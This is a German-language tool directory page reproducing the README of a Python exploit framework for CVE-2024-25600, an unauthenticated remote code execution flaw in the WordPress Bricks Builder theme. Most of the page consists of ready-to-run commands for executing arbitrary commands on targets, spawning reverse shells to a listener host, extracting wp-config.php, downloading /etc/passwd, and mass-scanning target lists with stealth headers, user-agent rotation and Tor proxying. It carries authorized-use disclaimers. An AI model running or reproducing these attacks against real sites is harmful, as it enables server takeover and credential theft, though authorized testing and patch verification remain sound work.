Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
AufklärungSchwachstellenscannerExploitationShellcodeWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Payload-Entwicklung
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

Repository anzeigen
11vor 1 MonatNoch nicht geprüft

Über

CVE-2024-25600 - Nicht authentifizierter RCE-Exploit für das WordPress Bricks Builder Theme. Erweitertes Exploitation-Framework mit interaktiver Shell, Reverse-Shells, Datei-Upload/-Download, asynchronem Scannen, Stealth-Modus, Proxy-Unterstützung und mehrthreadigem Schwachstellen-Scanning. Nur für autorisierte Sicherheitstests.

Teilen

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder Unathentifizierte RCE

Python Version CVSS CVE License Platform

Autorisiertes Sicherheitsbewertungstool für CVE-2024-25600
Autor: Sudeepa Wanigarathna · Tool: BricksRCE Exploiter v1.0
Hauptskript: cve-2024-25600.py

b

[!IMPORTANT] Nur für autorisierte Nutzung. Dieses Tool dient der Sicherheitsforschung, Bildung und dem Testen von Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zur Überprüfung haben. Unautorisierter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


Inhaltsverzeichnis

  • Übersicht
  • Schwachstellendetails
  • Funktionen
  • Installation
  • Schnellstart
  • Nutzungsanleitung
  • Befehlsreferenz
  • Interaktive Shell
  • Ausgabe & Protokollierung
  • Fehlerbehebung
  • Repository-Struktur
  • Versionshistorie
  • Haftungsausschluss
  • Autor & Danksagung
  • Lizenz

Übersicht

CVE-2024-25600 ist eine kritische, unathentifizierte Remote-Codeausführungs-Schwachstelle im WordPress-Theme Bricks Builder. Eine unsachgemäße Handhabung von benutzergesteuerten Eingaben im REST-Endpunkt render_element ermöglicht es unathentifizierten Angreifern, beliebige PHP-/Systembefehle auf betroffenen Installationen auszuführen.

BricksRCE Exploiter (cve-2024-25600.py) ist ein voll ausgestattetes Python-Bewertungstool für autorisierte Sicherheitsexperten, um:

  • Anfällige Bricks-Builder-Installationen zu erkennen
  • Die Auswirkung durch kontrollierte Befehlsausführung zu validieren
  • Über eine interaktive Shell mit kompromittierten Hosts zu interagieren
  • Ziellisten mit asynchronen/Thread-basierten Workern massenhaft zu scannen
  • Strukturierte Ergebnisse für Berichte zu exportieren

Schwachstellendetails

AttributWert
CVE-IDCVE-2024-25600
CVSS9.8 (Kritisch)
AngriffsvektorNetzwerk – unathentifiziert
AuswirkungVollständige Remote-Codeausführung, Kompromittierung der Vertraulichkeit / Integrität / Verfügbarkeit
Betroffenes ProduktWordPress Bricks Builder Theme
Betroffene VersionenBricks ≤ 1.9.6 (gepatcht in 1.9.6.1+)
SchwachstellentypUnathentifizierte Remote-Codeausführung
CWECWE-94 (Unzureichende Kontrolle der Codegenerierung)

Betroffene Endpunkte

EndpunktMethode
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

Angriffszusammenfassung

  1. Extraktion eines Bricks-Nonce aus dem Quelltext der Zielseite
  2. Senden einer manipulierten render_element-Anfrage mit einem bösartigen Element-Payload
  3. Serverseitige Codeauswertung führt zur Ausführung beliebiger Befehle

Referenzen

  • CVE-2024-25600 (MITRE)
  • NVD-Eintrag
  • Bricks Builder Changelog / Sicherheitshinweis

Funktionen

Kernfähigkeiten

FähigkeitBeschreibung
Erkennung von SchwachstellenBestätigt RCE mittels kontrolliertem Marker-basiertem Test
Nonce-ExtraktionMulti-Methode-Nonce-Erkennung (Skripte, Seitenquelltext, Meta, REST)
VersionserkennungIdentifiziert die Bricks-Builder-Version aus CSS / readme / REST
Interaktive ShellVollständiges REPL mit Verlauf, Autovervollständigung und Dateiübertragung
EinzelbefehlsmodusFührt einen Befehl aus und beendet sich (skriptfreundlich)
Reverse-Shell-HelferGeneriert bash / nc / Python / PHP / Perl / Ruby Reverse-Shells
wp-config-ExtraktionVersucht, wp-config.php zu finden und auszulesen
MassenscanningAsynchrones oder Thread-basiertes Multi-Ziel-Scannen aus einer URL-Liste

Betriebssteuerung

FähigkeitBeschreibung
RatenbegrenzungKonfigurierbare Verzögerung zwischen Anfragen
WiederholungslogikExponentieller Backoff bei Zeitüberschreitungen und Verbindungsfehlern
User-Agent-RotationZufällige Browser-Fingerabdrücke pro Anfrage
Stealth-ModusZufällige Accept-Language- / Accept-Encoding-Header
Proxy-UnterstützungHTTP, HTTPS, SOCKS5 / SOCKS5h
Duale EndpunkteBevorzugt wp-json, rest_route oder beide
Force-ModusÜberspringt die Vorabprüfung und versucht den Exploit direkt
Rich-CLIFortschrittsbalken, Tabellen und farbige Panels via Rich

Berichterstattung

FähigkeitBeschreibung
JSON / TXT-ExportSpeichert Scan-Ergebnisse und anfällige Ziele
BefehlsverlaufOptionale Protokollierung ausgeführter Befehle
DateiprotokollierungDauerhafte bricks_rce.log plus benutzerdefinierte Protokollpfade

Installation

Voraussetzungen

  • Python 3.8+
  • pip
  • Netzwerkerreichbarkeit zu autorisierten Zielen

Einrichtung

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

Abhängigkeiten

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # optional — SOCKS5-Proxy-Unterstützung

Schnellstart

Ersetzen Sie https://target.example nur durch ein Labor- oder autorisiertes Ziel.

root@kitploit:~
# Interaktive Shell
python3 cve-2024-25600.py -u https://target.example

# Einzelbefehl
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Massenscan
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Versionserkennung
python3 cve-2024-25600.py -u https://target.example --detect-version

# Über Burp-Proxy
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

Nutzungsanleitung

Alle Beispiele verwenden das Hauptskript: cve-2024-25600.py

1. Hilfe anzeigen

root@kitploit:~
python3 cve-2024-25600.py --help

2. Einzelziel-interaktive Shell

Öffnet eine interaktive RCE-Shell, nachdem bestätigt wurde, dass das Ziel anfällig ist.

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

Ablauf:

  1. URL normalisieren und validieren
  2. Nonce aus der Seite extrahieren
  3. Schwachstelle überprüfen (außer mit --force)
  4. In eine interaktive Shell eintreten

3. Einzelnen Befehl ausführen

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

Befehlsausgabe in einer Datei speichern:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. Payload-Typ wählen

root@kitploit:~
# Standard-PHP-Exception-basierter Payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system()-basierter Payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Bricks-Builder-Version erkennen

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

Kombiniert mit einem Befehl:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. wp-config.php extrahieren

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

Wird bei Erfolg als wp-config_<target>.txt gespeichert.

7. Reverse-Shells (nur autorisiertes Labor)

root@kitploit:~
# Terminal 1 — Listener
nc -lvnp 4444

# Terminal 2 — Bash Reverse-Shell
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

Alle unterstützten Reverse-Shell-Typen:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. Force-Modus (Schwachstellenprüfung überspringen)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. Massenscanning aus einer Datei

root@kitploit:~
# targets.txt — eine URL pro Zeile
python3 cve-2024-25600.py -f targets.txt

Mit Threads, Verzögerung, Stealth und JSON-Ausgabe:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

Synchrone (Thread-Pool) anstelle von asynchroner Abtastung:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

Leiser Massenscan:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. Endpunktauswahl

root@kitploit:~
# Beide Endpunkte (Standard)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# Nur /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# Nur /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. Stealth-Modus

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. Benutzerdefinierter User-Agent

root@kitploit:~
# Benutzerdefinierter UA
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# Zufällige UA-Rotation deaktivieren
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. Proxy-Unterstützung

root@kitploit:~
# HTTP-Proxy (z.B. Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# SOCKS5-Proxy
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS über Proxy / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. SSL-Verifizierung

root@kitploit:~
# SSL-Zertifikatsprüfung aktivieren (standardmäßig deaktiviert)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. Ausgabe und Protokollierung

root@kitploit:~
# Scan-Ergebnisse als JSON speichern
python3 cve-2024-25600.py -f targets.txt -o results.json

# Scan-Ergebnisse als TXT speichern
python3 cve-2024-25600.py -f targets.txt -o results.txt

# Benutzerdefinierte Anwendungsprotokolldatei
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# Ausgeführte Befehle protokollieren
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. Ausführliche und leise Modi

root@kitploit:~
# Ausführlich / Debug-Protokollierung
python3 cve-2024-25600.py -u https://target.example -v

# Leiser Modus (minimale Ausgabe)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. Leistungstuning

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. Kombiniertes vollständiges Bewertungsbeispiel

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. Integrierte Befehle der interaktiven Shell

Nach dem Start mit -u (ohne --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

Befehlsreferenz

Zieloptionen

ArgumentBeschreibung
-u, --urlEinzelne Ziel-URL
-f, --fileDatei mit Ziel-URLs (eine pro Zeile)

Scan-Optionen

ArgumentStandardBeschreibung
-t, --threads10Gleichzeitige Worker für Massenscans
--delay0.5Verzögerung zwischen Anfragen (Sekunden)
--timeout15HTTP-Anfrage-Timeout (Sekunden)
--max-retries3Wiederholungsversuche bei Fehlschlag
--forceausSchwachstellenprüfung überspringen
--syncausThread-Pool anstelle von async verwenden

Stealth-Optionen

ArgumentBeschreibung
--user-agentBenutzerdefinierter User-Agent-String
--no-random-uaUser-Agent-Rotation deaktivieren
--proxyProxy-URL (http://, https://, socks5://, socks5h://)
--stealthStealth-Modus aktivieren (zufällige Header + Verzögerungen)
--endpointjson | rest_route | both (Standard: both)

Exploit-Optionen

ArgumentBeschreibung
--cmdEinzelnen Befehl ausführen und beenden
--payloadPayload-Typ: php (Standard) oder system
--reverse-shellShell-Typ: bash, nc, python, php, perl, ruby
--lhostListener-Host für Reverse-Shell
--lportListener-Port für Reverse-Shell
--extract-wp-configVersucht, wp-config.php zu extrahieren
--detect-versionBricks-Builder-Version erkennen
--save-outputAusgabe eines Einzelbefehls in einer Datei speichern

Ausgabeoptionen

ArgumentBeschreibung
-o, --outputErgebnisdatei (.json oder .txt)
--log-fileBenutzerdefinierter detaillierter Protokollpfad
--command-logAusgeführte Befehle in einer Datei protokollieren
-v, --verboseDebug-Protokollierung
-q, --quietMinimale Konsolenausgabe
--verify-sslSSL-Zertifikatsprüfung aktivieren (standardmäßig deaktiviert)

Interaktive Shell

Beim Ausnutzen eines einzelnen Ziels ohne --cmd oder --reverse-shell öffnet sich eine interaktive Shell:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

Integrierte Befehle

BefehlBeschreibung
exitShell beenden
helpHilfe anzeigen
clearBildschirm löschen
download [remote]Remote-Datei herunterladen (base64-Transfer)
upload [local] [remote]Lokale Datei auf das Ziel hochladen
php [cmd]Über PHP-Payload ausführen (Standard)
system [cmd]Über system()-Payload ausführen

Funktionen

  • Befehlsverlauf gespeichert in ~/.bricks_rce_history
  • Autovervollständigung für gängige Befehle
  • Auto-Vorschläge aus dem Verlauf (prompt-toolkit)

Ausgabe & Protokollierung

Konsole

Rich-gestützte Panels, Fortschrittsbalken und Ergebnistabellen:

root@kitploit:~
[*] Teste: https://target.example
[+] https://target.example ist anfällig!
[+] Interaktive Shell erfolgreich geöffnet

Scan-Ergebnistabelle

MetrikBeschreibung
Gesamt verarbeitetGescannte URLs
ErfolgreichBestätigt anfällig
FehlgeschlagenNicht anfällig / nicht erreichbar
Anfällig gefundenAnzahl bestätigter RCE-Ziele
Befehle ausgeführtGesamtzahl der RCE-Befehlsausführungen
Verstrichene ZeitWanduhr-Scandauer

JSON-Export (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

Protokolldateien

DateiZweck
bricks_rce.logStandard-Append-Only-Anwendungsprotokoll
--log-file PATHZusätzlicher benutzerdefinierter Log-Handler
--command-log PATHPrüfpfad für ausgeführte Befehle

Fehlerbehebung

SymptomWas zu tun ist
Nonce nicht gefundenBestätigen, dass Bricks aktiv ist; -v versuchen; sicherstellen, dass die Startseite lädt
Ziel nicht anfälligBricks ≤ 1.9.6 überprüfen; --force versuchen; beide Endpunkte prüfen
Verbindungszeitüberschreitungen--timeout / --max-retries erhöhen; Proxy prüfen
Ratenbegrenzung (429)--delay erhöhen; --stealth aktivieren
SSL-FehlerStandardmäßig wird Verifizierung übersprungen; --verify-ssl nur bei Bedarf verwenden
Async-Instabilität--sync für Thread-basiertes Scannen verwenden
Reverse-Shell schlägt fehlBestätigen, dass der Listener läuft; alternative Shell-Typen versuchen (python, nc)
Leere BefehlsausgabeBefehl könnte ohne stdout erfolgreich gewesen sein; echo test versuchen
wp-config nicht gefundenPfade variieren je nach Host; interaktive Shell mit benutzerdefiniertem find / cat verwenden

Debug-Workflow

root@kitploit:~
# Ausführlicher Einzelziel-Check
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# Über Burp zur Anfrageinspektion
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# Bestimmten Endpunkt bevorzugen
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

Repository-Struktur

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # Python-Abhängigkeiten
├── README.md             # Diese Datei
├── bricks_rce.log        # Laufzeitprotokoll (generiert)
└── venv/                 # Lokales Virtualenv (optional, nicht eingecheckt)

Versionshistorie

v1.0.0 — Erstveröffentlichung

  • Erkennung und Ausnutzung unathentifizierter RCE für CVE-2024-25600
  • Multi-Methode-Nonce-Extraktion
  • Interaktive Shell mit Upload / Download
  • Einzelbefehls- und Reverse-Shell-Modi
  • Asynchrones / Thread-basiertes Massenscanning
  • Versionserkennung und wp-config-Extraktion
  • Stealth-Modus, UA-Rotation, Proxy-Unterstützung
  • Rich-CLI mit JSON/TXT-Ergebnisexport

Haftungsausschluss

Dieses Projekt wird wie besehen für defensive Sicherheitsforschung und autorisierte Penetrationstests bereitgestellt.

Durch die Nutzung dieser Software stimmen Sie zu, dass:

  1. Sie nur Systeme angreifen, die Ihnen gehören oder für die Sie ausdrücklich autorisiert sind.
  2. Sie die geltenden Gesetze zu Computerbetrug und Datenschutz verstehen.
  3. Der Autor und die Mitwirkenden nicht verantwortlich sind für Schäden, Datenverluste oder rechtliche Konsequenzen aus Missbrauch.

Wenn Sie diese Schwachstelle in Produktionsumgebungen entdecken, die Ihnen nicht gehören, befolgen Sie verantwortungsvolle Offenlegungspraktiken und koordinieren Sie sich mit dem Website-Betreiber / dem Bricks-Builder-Sicherheitsteam.

Unautorisierter Zugriff auf Computersysteme ist eine Straftat.


Autor & Danksagung

RolleName
Tool-AutorSudeepa Wanigarathna
CVECVE-2024-25600
ToolBricksRCE Exploiter v1.0
Hauptskriptcve-2024-25600.py
LizenzMIT

Lizenz

root@kitploit:~
MIT License

Copyright (c) 2024–2026 Sudeepa Wanigarathna

Hiermit wird jeder Person, die eine Kopie dieser Software und der zugehörigen
Dokumentationsdateien (die "Software") erhält, kostenlose Erlaubnis erteilt,
die Software ohne Einschränkung zu nutzen, einschließlich und ohne
Einschränkung der Rechte zur Nutzung, Vervielfältigung, Änderung,
Zusammenführung, Veröffentlichung, Verteilung, Unterlizenzierung und/oder
zum Verkauf von Kopien der Software, und Personen, denen die Software
bereitgestellt wird, dies unter den folgenden Bedingungen zu gestatten:

Der obige Urheberrechtshinweis und diese Genehmigungsmitteilung müssen in
allen Kopien oder wesentlichen Teilen der Software enthalten sein.

DIE SOFTWARE WIRD "WIE BESEHEN" ZUR VERFÜGUNG GESTELLT, OHNE JEGLICHE
AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG, EINSCHLIESSLICH,
ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT,
EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND NICHTVERLETZUNG VON RECHTEN
DRITTER.

Unterstützung

  • Sternen Sie das Repository, wenn es Ihrer autorisierten Forschung hilft
  • Öffnen Sie Issues für Fehler, Fehlalarme oder Erkennungsverbesserungen
  • Pull-Requests sind willkommen für Dokumentation und autorisierte Labor-UX

Nur für autorisierte Sicherheitstests.

Tool herunterladen